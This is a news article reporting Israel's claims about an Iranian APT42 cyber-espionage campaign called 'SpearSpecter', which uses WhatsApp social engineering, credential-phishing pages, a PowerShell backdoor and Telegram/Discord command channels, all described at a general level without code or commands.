Policy

The silent attack… Israel speaks of “unprecedented” Iranian espionage

27th November 2025
2 minutes read
The silent attack… Israel speaks of “unprecedented” Iranian espionage
The silent attack… Israel speaks of “unprecedented” Iranian espionage

A new Iranian cyber campaign is reportedly targeting officials using deep social engineering, according to Israel.

This was revealed by Israel’s National Digital Agency, which spoke of a sophisticated and unprecedented Iranian cyber-espionage campaign codenamed “SpearSpecter,” attributed to a group linked to the intelligence services of the Revolutionary Guard, according to Yedioth Ahronoth.

Targets and attack methods

This group — also known as APT42 and CharmingCypress — now operates with new methods and tactics, moving away from broad and indiscriminate attacks toward precise espionage based on advanced social engineering.

In a briefing with cybersecurity researcher Shimi Cohen and Nir Bar Yosef, head of the agency’s cyber unit, officials revealed that the campaign systematically targets high-value individuals in Israel’s defense and government sectors, along with members of their families.

Bar Yosef stated: “This campaign represents a significant development. Cyberattacks have become more personalized and require greater resources. It is no longer just about stealing passwords but about gaining long-term, continuous access to specific targets.”

According to the agency, the attackers spend days or even weeks building what appear to be legitimate personal or professional relationships with their targets.

Common luring techniques include invitations to “prestigious conferences” or scheduling “high-level meetings.”

As of the time of writing, Iran has neither confirmed nor denied the claims made by the Israeli digital agency.

WhatsApp… a tool for building trust and gaining access

Among the primary tools used is the WhatsApp application, which provides a familiar interface to establish trust.

In this context, the security expert explained that “the campaign begins with the collection of preliminary information, after which the attackers impersonate a real individual and usually contact the target via WhatsApp.”

Once trust is established, a malicious link is sent to activate a complex attack chain. For lower-value targets, pre-designed fake meeting pages are used to capture login credentials in real time.

For high-value targets, the goal is to implant an advanced backdoor identified by Google as “TAMECAT,” which relies on PowerShell, making it much harder to detect with traditional security tools.

Exploitation of Windows features and the WebDAV protocol


 The attackers also exploit built-in Windows features and the WebDAV protocol (used to edit documents through a browser) during the preparation phase of the malicious payload.

To evade detection, they use a multichannel command-and-control structure based on legitimate platforms such as Telegram and Discord, making the data flow appear normal.

Bar Yosef explained: “The innovation here lies in concealing the data flow. They use legitimate services like Telegram and Discord as control servers, making data leakage extremely difficult to detect.”

He added: “In today’s threat landscape, the number-one rule is: verify, then verify again, and then verify once more.”

27th November 2025
2 minutes read
Show More

Related Articles

One year after the end of the war… 669 Israeli strikes in Lebanon and 360 Hezbollah fighters killed

One year after the end of the war… 669 Israeli strikes in Lebanon and 360 Hezbollah fighters killed

27th November 2025
US pressure pushes Israel to bring debris-removal equipment into Gaza

US pressure pushes Israel to bring debris-removal equipment into Gaza

27th November 2025
Jordan’s Muslim Brotherhood… Amman closes the chapter as Washington writes the ending

Jordan’s Muslim Brotherhood… Amman closes the chapter as Washington writes the ending

26th November 2025
Three contentious issues threaten a Ukraine settlement… traps cloud the optimism

Three contentious issues threaten a Ukraine settlement… traps cloud the optimism

26th November 2025
Financial drought pressures Kyiv as Europe considers a temporary rescue plan

Financial drought pressures Kyiv as Europe considers a temporary rescue plan

26th November 2025
Raids and arrests: Israeli operation in the northern West Bank

Raids and arrests: Israeli operation in the northern West Bank

26th November 2025
The 2026 calendar reinforces the Putin habit: a man for every season

The 2026 calendar reinforces the Putin habit: a man for every season

26th November 2025
A new blow to ISIS in Puntland… Arrest of the logistics and communications chief

A new blow to ISIS in Puntland… Arrest of the logistics and communications chief

25th November 2025
Winter fog hides what is most dangerous: Israeli drill amid Hezbollah retaliation fears

Winter fog hides what is most dangerous: Israeli drill amid Hezbollah retaliation fears

25th November 2025
Gaza hospitals face severe shortages of medical supplies as Israeli attacks continue

Gaza hospitals face severe shortages of medical supplies as Israeli attacks continue

25th November 2025
Back to top button
Verified by MonsterInsights